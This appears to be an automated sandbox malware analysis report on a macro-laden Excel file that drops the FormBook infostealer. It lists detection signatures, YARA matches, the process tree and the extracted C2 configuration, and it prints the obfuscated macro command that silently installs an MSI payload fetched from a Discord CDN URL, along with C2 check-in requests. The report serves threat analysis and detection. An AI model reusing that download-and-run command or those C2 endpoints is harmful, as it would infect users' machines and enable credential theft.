Loading ...

Play interactive tourEdit tour

Analysis Report 0d69e4f6_by_Libranalysis

Overview

General Information

Sample Name:0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:402839
MD5:0d69e4f684735cf4f187659ee0882fd8
SHA1:55a52f6971084224e3030b76cd44d13b0203b749
SHA256:0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2948 cmdline: 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • msiexec.exe (PID: 2892 cmdline: mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn MD5: AC2E7152124CEED36846BD1B6592A00F)
  • MSID8B1.tmp (PID: 3012 cmdline: C:\Windows\Installer\MSID8B1.tmp MD5: 12AB5A6E917A80D7B94F2EBE725A4B23)
    • MSID8B1.tmp (PID: 2472 cmdline: C:\Windows\Installer\MSID8B1.tmp MD5: 12AB5A6E917A80D7B94F2EBE725A4B23)
      • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
      • wininit.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
        • cmd.exe (PID: 2252 cmdline: /c del 'C:\Windows\Installer\MSID8B1.tmp' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.MSID8B1.tmp.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.MSID8B1.tmp.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.MSID8B1.tmp.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        6.2.MSID8B1.tmp.710000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.MSID8B1.tmp.710000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.111bjs.com/ccr/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsReversingLabs: Detection: 38%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsJoe Sandbox ML: detected
          Source: 7.2.MSID8B1.tmp.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.MSID8B1.tmp.710000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.1.MSID8B1.tmp.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.111bjs.com/ccr/
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox ViewIP Address: 99.83.154.118 99.83.154.118
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi
          Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn
          Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Document contains an embedded VBA macro which may execute processesShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsOLE, VBA macro line: vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)
          Source: VBA code instrumentationOLE, VBA macro: Module AK2_oiMjTt8L, Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP, API IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0:Integer)
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76D20000 page execute and read and write
